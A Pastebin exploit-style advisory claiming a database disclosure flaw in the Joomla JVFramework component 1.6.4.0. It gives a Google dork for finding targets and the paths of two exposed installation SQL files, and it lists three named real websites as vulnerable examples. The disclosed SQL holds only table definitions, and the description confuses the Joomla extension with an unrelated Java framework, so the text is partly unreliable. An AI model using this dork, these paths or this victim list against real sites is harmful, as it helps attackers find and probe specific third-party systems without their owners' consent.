Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 19/01/2019
- # Vendor Homepages : joomlavi.com ~ jvframework.com
- # Software Download Link :
- bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
- # Software Information Link : sourceforge.net/projects/jvframework/
- # Software Affected Version : 1.6.4.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/administrator/components/com_jvframework/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- ####################################################################
- # Description :
- **************
- *JV Framework brings you the power to handle your website in the most elegant way.
- *JV Framework has got the first-time deployed Drag and Drop feature.
- *JVFramework is an application framework for Java. It's main goal is to avoid code duplication
- (such as metatada, UI programming, etc) related to the construction of a
- web application, providing a declarative language for business tier programming.
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_jvframework/installation/install.sql
- /administrator/components/com_jvframework/installation/uninstall.sql
- ####################################################################
- # Information : [ uninstall.sql ] =>
- ************
- -- --------------------------------------------------------
- DROP TABLE IF EXISTS `#__jv_themes`;
- -- --------------------------------------------------------
- DROP TABLE IF EXISTS `#__jv_theme_assign`;
- *******************************************
- # Information : [ install.sql ] =>
- -- -------------------------------------------------------------
- CREATE TABLE IF NOT EXISTS `#__jv_themes` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `theme` varchar(50) NOT NULL,
- `home` tinyint(1) NOT NULL,
- `params` varchar(10240) NOT NULL,
- `published` tinyint(1) NOT NULL DEFAULT '0',
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
- -- -------------------------------------------------------------
- CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `menuid` int(11) NOT NULL,
- `themeid` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql
- [+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql
- [+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment